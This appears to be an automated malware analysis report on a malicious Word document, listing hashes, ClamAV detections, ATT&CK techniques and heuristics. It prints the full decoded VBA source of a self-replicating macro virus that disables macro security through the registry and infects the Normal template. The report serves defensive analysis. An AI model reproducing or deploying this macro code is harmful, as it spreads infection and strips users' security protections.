Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 90335952a2331c3a…

MALICIOUS

Office (OLE)

29.0 KB Created: 2003-03-06 21:44:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 31eb3a949e65dd4072029e4242fa219b SHA-1: 38ecd83950e16f3ff89d87bd0d41728841c4ad78 SHA-256: 90335952a2331c3afe348470930f27b1be1ebbe2fff6c33a0ee546c6a8db2f86
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro, which is designed to disable macro security and inject code into the Normal template. This suggests an attempt to achieve persistence by modifying registry keys related to Office security settings. The ClamAV detections indicate known malicious behavior associated with this file.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2034 bytes
SHA-256: cc35546f1be57ffd04575d0969125e4beaaa5949feac6ac92d4b861de6795df4
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Document_Open()
On Error Resume Next
'Word2002.FirstLife
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If Application.Version = "10.0" Then
MsgBox "10"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
Application.AutomationSecurity = msoAutomationSecurityForceDisable
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
End If
End If
If Application.Version = "9.0" Then
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Tools").Controls("Macro").Enabled = False
End If
End If
TD = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
If NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(3, 1) <> "'Word2002.FirstLife" Then
Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
NT.DeleteLines 1, NT.CountOfLines
NT.AddFromString TD
NT.ReplaceLine 1, "Sub Document_Close()"
End If
If ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1) <> "'Word2002.FirstLife" Then
Set VA = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
VA.DeleteLines 1, VA.CountOfLines
VA.AddFromString TD
VA.ReplaceLine 1, "Sub Document_Open()"
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub